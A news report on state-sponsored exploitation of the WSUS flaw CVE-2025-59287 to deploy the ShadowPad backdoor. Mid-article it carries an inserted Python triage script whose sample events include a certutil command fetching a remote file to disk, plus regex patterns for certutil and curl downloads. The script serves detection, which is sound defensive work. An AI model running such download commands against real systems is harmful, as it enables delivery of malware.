- Chinese state-sponsored actors are exploiting CVE-2025-59287, a critical WSUS flaw that allows unauthenticated RCE with SYSTEM privileges
- AhnLab reports that attackers use PowerCat and certutil/curl to deploy ShadowPad, a successor backdoor to PlugX
- Likely targets include the government, defense, telecommunications and critical infrastructure sectors.
Experts have warned that Chinese state-sponsored threat actors are actively exploiting a vulnerability in Microsoft Windows Server Update Services (WSUS) to spread malware.
As part of its October 2025 Patch Tuesday cumulative update, Microsoft addressed CVE-2025-59287, an “untrusted data deserialization” flaw found in Windows Server Update Services (WSUS). The flaw received a severity score of 9.8/10 (critical) as it apparently enables remote code execution (RCE) attacks. It can be abused in low-complexity attacks, without user interaction, giving unauthenticated and unprivileged threat actors the ability to execute malicious code with SYSTEM privileges. In theory, it would allow them to pivot and infect other WSUS servers as well.
Shortly after, publicly available proof-of-concept (PoC) code was spotted, prompting Microsoft to also release an out-of-band (OOB) security update.
Used for ShadowPad deployment
Now, security researchers at the AhnLab Security Intelligence Center (ASEC) said they are seeing attacks against unpatched endpoints, hinting that it is the work of Chinese state-sponsored actors.
“The attacker targeted Windows servers with WSUS enabled, exploiting CVE-2025-59287 for initial access,” the report reads. “They then used PowerCat, an open source PowerShell-based Netcat utility, to obtain a system shell (CMD). They then downloaded and installed ShadowPad using certutil and curl.”
ShadowPad is reported to be the successor to PlugX, a modular backdoor that was “widely used” by Chinese state-sponsored hacking collectives. It is deployed to target endpoints by DLL sideloading, via a legitimate binary called ETDCtrlHelper.exe.
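As an added example, not code from the AhnLab report or this article: a small Python triage over constructed Sysmon-style events that flags the three observable steps of the chain described above (a shell spawned by the WSUS host process, certutil/curl fetching a remote file to disk, and ETDCtrlHelper.exe loading an unsigned DLL from its own directory). The WSUS parent-process names (w3wp.exe, WsusService.exe), the DLL name, the paths and the URL are assumptions and constructed values, not details from the article.

```python
import re

# Constructed Sysmon-style events, not real telemetry: id 1 = process create, id 7 = image load.
SAMPLE_EVENTS = [
    {"id": 1, "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",          # assumed WSUS IIS worker
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c powershell -nop -c <constructed>"},
    {"id": 1, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -urlcache -split -f http://203.0.113.10/x.bin C:\ProgramData\x.bin"},
    {"id": 7, "Image": r"C:\ProgramData\Helper\ETDCtrlHelper.exe",              # assumed staging path
     "ImageLoaded": r"C:\ProgramData\Helper\sideloaded.dll", "Signed": "false"},  # constructed DLL name
    {"id": 1, "ParentImage": r"C:\Windows\explorer.exe",                          # benign certutil use
     "Image": r"C:\Windows\System32\certutil.exe", "CommandLine": r"certutil -hashfile C:\setup.msi SHA256"},
]

WSUS_PARENTS = {"w3wp.exe", "wsusservice.exe"}   # assumption: processes that host WSUS code
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Command-line shapes that write a remote file to disk with the two LOLBins named in the report.
DOWNLOAD_PATTERNS = {
    "certutil.exe": re.compile(r"-urlcache|-split", re.I),
    "curl.exe": re.compile(r"(^|\s)(-o|-O|--output)\b"),
}

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def dirname(path: str) -> str:
    return path.rsplit("\\", 1)[0].lower()

def classify(ev: dict) -> list[str]:
    """Return the detection labels that apply to one event (empty list if benign)."""
    alerts = []
    if ev["id"] == 1:
        img, parent = basename(ev["Image"]), basename(ev["ParentImage"])
        if parent in WSUS_PARENTS and img in SHELLS:
            alerts.append("shell spawned by WSUS host process")
        pat = DOWNLOAD_PATTERNS.get(img)
        if pat and pat.search(ev["CommandLine"]):
            alerts.append(f"{img} used to fetch a remote file to disk")
    elif ev["id"] == 7 and basename(ev["Image"]) == "etdctrlhelper.exe":
        # Sideload signal: the helper binary loads an unsigned DLL from its own directory.
        same_dir = dirname(ev["ImageLoaded"]) == dirname(ev["Image"])
        if same_dir and ev.get("Signed", "true").lower() == "false":
            alerts.append("ETDCtrlHelper.exe loaded unsigned DLL from its own directory (sideload)")
    return alerts

def scan(events: list[dict]) -> list[tuple[int, str]]:
    """Run classify() over a batch and return (event index, label) pairs."""
    return [(i, label) for i, ev in enumerate(events) for label in classify(ev)]
```

Correlating the three labels on one host within a short window is what turns these individual hits into a high-confidence alert; any one of them alone has benign explanations.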
We don’t know how many companies were attacked through WSUS, where they are, or what industries they operate in. However, if it is the work of Chinese state-sponsored actors, the likely targets are government, military and defense, telecommunications, or critical infrastructure organizations.
“After proof-of-concept (PoC) exploit code for the vulnerability was publicly released, attackers quickly weaponized it to distribute ShadowPad malware via WSUS servers,” AhnLab said. “This vulnerability is critical because it allows remote code execution with system-level permission, significantly increasing the potential impact.”
WSUS allows IT administrators to manage patching of computers within their network.
Via The Hacker News